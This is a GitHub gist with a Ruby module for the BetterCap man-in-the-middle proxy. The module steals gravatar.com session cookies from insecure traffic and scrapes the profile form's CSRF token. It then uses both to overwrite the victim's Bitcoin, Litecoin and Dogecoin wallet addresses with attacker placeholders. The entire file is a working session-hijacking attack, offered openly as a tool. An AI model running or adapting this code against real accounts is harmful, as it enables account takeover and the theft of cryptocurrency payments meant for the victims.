Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
=begin
BETTERCAP
Author : Luke "groovecoder" Crouch
Email : luke.crouch@gmail.com
Blog : http://groovecoder.com
This project is released under the GPL 3 license.
=end
require "nokogiri"
class UpdateGravatarWallets < BetterCap::Proxy::HTTP::Module
meta(
'Name' => 'UpdateGravatarWallets',
'Description' => "Intercepts gravatar.com session cookies and uses them to update the victim's gravatar profile's crypto-currency wallet addresses.",
'Version' => '1.0.0',
'Author' => "Luke 'groovecoder' Crouch",
'License' => 'GPL3'
)
def on_request( request, response )
# Hack insecure requests to gravatar.com
if request.host == "www.gravatar.com" and response.content_type =~ /^image\/png/
BetterCap::Logger.info "Hacking http://#{request.host}"
cookie = request.headers['Cookie']
auth = ""
# get the auth value for the form-profile
uri = URI('https://en.gravatar.com/profiles/edit/#currency-services')
Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do |http|
request = Net::HTTP::Get.new uri
request['Cookie'] = cookie
response = http.request request
body = response.read_body
doc = Nokogiri::HTML(body)
input = doc.css('input[name="auth"]').first
auth = input['value']
end
# POST new wallet addresses using the hijacked cookie and the auth value
Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do |http|
request = Net::HTTP::Post.new uri
request['Cookie'] = cookie
request.set_form_data('auth' => auth,
'panel' => 'currency-services',
'currency.bitcoin' => 'attacker-bitcoin-address',
'currency.litecoin' => 'attacker-litecoin-address',
'currency.dogecoin' => 'attacker-dogecoin-address',
'save' => 'Save Currencies')
response = http.request request
end
end
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.